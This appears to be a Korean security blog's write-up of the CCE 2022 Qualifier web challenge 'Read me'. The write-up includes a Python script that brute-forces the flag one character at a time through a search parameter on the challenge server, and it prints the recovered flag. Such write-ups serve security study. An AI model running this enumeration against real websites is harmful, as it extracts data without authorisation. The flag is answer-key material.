$ whoami
Home
  • 분류 전체보기 (123)
    • Exploit (10)
      • Tools (2)
      • Exploit (5)
      • Bug Bounty (3)
    • Wargame (84)
      • HackCTF (15)
      • XSS game (6)
      • Dreamhack (2)
      • Webhacking.kr (10)
      • XSS Challenges (8)
      • H4CKING GAME (2)
      • 정보보호영재교육원 (1)
      • Lord of SQL Injection (40)
    • CTF (29)
      • YISF 2022 (0)
      • CBHC 2022 (1)
      • HeroCTF v4 (2)
      • corCTF 2022 (2)
      • Aero CTF 2022 (0)
      • BDSec CTF 2022 (4)
      • San Diego CTF 2022 (5)
      • WACon 2022 Qualifier (1)
      • Cyber Conflict Exercise 202.. (4)
      • DiceCTF 2023 (1)
      • Incognito 4.0 (3)
      • BYUCTF 2023 (1)
      • DEF CON 31 (1)
      • 2023 HackTheon Sejong (1)
      • Cyber Conflict Exercise 202.. (2)
      • CDDC 2023 (1)
      • YISF 2023 (0)
    • Archive (0)
Home
  • 분류 전체보기 (123)
    • Exploit (10)
      • Tools (2)
      • Exploit (5)
      • Bug Bounty (3)
    • Wargame (84)
      • HackCTF (15)
      • XSS game (6)
      • Dreamhack (2)
      • Webhacking.kr (10)
      • XSS Challenges (8)
      • H4CKING GAME (2)
      • 정보보호영재교육원 (1)
      • Lord of SQL Injection (40)
    • CTF (29)
      • YISF 2022 (0)
      • CBHC 2022 (1)
      • HeroCTF v4 (2)
      • corCTF 2022 (2)
      • Aero CTF 2022 (0)
      • BDSec CTF 2022 (4)
      • San Diego CTF 2022 (5)
      • WACon 2022 Qualifier (1)
      • Cyber Conflict Exercise 202.. (4)
      • DiceCTF 2023 (1)
      • Incognito 4.0 (3)
      • BYUCTF 2023 (1)
      • DEF CON 31 (1)
      • 2023 HackTheon Sejong (1)
      • Cyber Conflict Exercise 202.. (2)
      • CDDC 2023 (1)
      • YISF 2023 (0)
    • Archive (0)
블로그 내 검색
CONTACT

HACKINTOANETWORK

SECURITY RESEARCHER, BUG HUNTER, HACKER

  • CTF/Cyber Conflict Exercise 2022

    [CCE 2022 Qualifier] Read me

    2022. 9. 25.

    by. hackintoanetwork

    option=content&searchWrd=cce2022{ 는 flag 형식이 cce2022{플래그} 임으로 충분히 게싱 가능했고 내용을 검색하기 위해서 title에서 content로 바꿔주었다. 플래그 뒷 부분은 파이썬 스크립트로 브루트 포싱해보면 나온다.


    import requests
    import string
    
    url = "http://3.36.61.250/?option=content&searchWrd=cce2022{"
    flag = "cce2022{"
    
    def get_flag(url,flag):
        while True:
            for i in string.printable:
                if i == "#" or i == "%" or i == "&" or i == "_":
                    continue
                res = requests.get(url=url+i)
                print("Try " + url + i)
                if "2022 CCE CTF held" in res.text:
                    url += i
                    flag += i
                    break
            if i == "}":
                print("FLAG : "+flag)
                break
    
    if __name__ == "__main__":
        get_flag(url,flag)

    Flag : cce2022{0f9f1a2e61641f9c54d488f8c4fc22bd}

    원래는 SQL Injection 문제였다고 한다..┏(ºдº)┛

    그렇다고 한다.

    저작자표시 비영리

    'CTF > Cyber Conflict Exercise 2022' 카테고리의 다른 글

    [CCE 2022 Qualifier] Request forgery  (0) 2022.09.25
    [CCE 2022 Qualifier] Login me  (0) 2022.09.25
    [CCE 2022 Qualifier] Auth Token  (0) 2022.09.24

    댓글

    관련글

    • [CCE 2022 Qualifier] Request forgery 2022.09.25
    • [CCE 2022 Qualifier] Login me 2022.09.25
    • [CCE 2022 Qualifier] Auth Token 2022.09.24
    맨 위로
전체 글 보기
Tistory 로그인
Tistory 로그아웃
로그아웃 글쓰기 관리

Today

Total

Powered by hackintoanetwork

Designed by Nana
블로그 이미지
hackintoanetwork

티스토리툴바